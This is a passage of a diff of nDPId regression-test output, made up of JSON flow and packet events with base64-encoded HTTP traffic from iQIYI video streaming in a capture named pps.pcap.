-02177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCEON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WS
Qf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"} -02162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbWDnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2z
e3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"} -01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"thread_ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="} 
-00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353157468,"pkt":"TF4M6gNlABxCjnAxCABFAAOkD3JAAIAG2tjAqHMIymwO7MU9AFA84A6MMfAazlAYQTez3QAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNTcwNDYmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
-01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
-01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00992{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"thread_ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\/e7VVAYAQRcuQAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQpSYW5nZTogYnl0ZXM9MzQyNDI1Ni04MDU3MDIzDQoNCg=="} -01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353155790,"pkt":"TF4M6gNlABxCjnAxCABFAAKdDjtAAIAG3SfAqHMIymwO28U3AFCNS81scTxdzlAYAQSLywAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0xNSZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNTUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 